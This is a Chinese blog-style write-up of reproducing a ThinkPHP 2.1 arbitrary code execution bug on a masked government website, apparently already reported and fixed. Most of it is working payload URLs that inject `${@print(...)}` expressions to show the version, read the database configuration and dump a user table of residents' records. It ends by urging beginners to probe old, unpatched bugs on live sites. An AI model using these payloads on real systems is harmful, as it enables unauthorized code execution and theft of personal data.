Ps:此漏洞已经上报国家机关并修复,未获得授权请勿进行违法操作
前言
ThinkPHP 2.x 任意代码执行,一个很老的漏洞,我自己也没想到会遇到haha
详细漏洞分析请看:https://www.freebuf.com/sectool/223149.html
复现步骤:
0x01
漏洞站:http://xxx.gov.cn/
后台地址为:http://xxx.gov.cn/admin.php/Public/login
可见是基于Thinkphp框架搭建的
在Public处加1,报错显示为Thinkphp2.1的
Thinkphp2.1是存在命令执行漏洞的
在这里试一下
0x02
- 1 .输出版本信息:http://xxx.gov.cn/admin.php/module/action/param1/$%7B@print(THINK_VERSION)%7D\
可见输出了版本信息为2.1
- 2.使用c方法,获取数据库 配置相关信息:http://xxx.gov.cn/admin.php/module/action/param1/$%7b@print(c(db_name))%7d
数据库为XXXX_police
- 3.使用d方法或者m方法,查询其他数据库:
猜测名为user
http://xxx.gov.cn/admin.php/module/action/param1/$%7b@print(var_dump(d(user)-%3Eselect()))%7d
由于涉及信息过于太多,所以重码了
输出了user表的信息
涉及该市各个区县的的用户信息
发这个洞主要是和才开始学习的小同志说下挖洞没有不妨试试老漏洞
有些站在前台可能看不出什么,后台说不定就有惊喜
三字经曰:
“新漏洞 搞不了
老漏洞 没修好”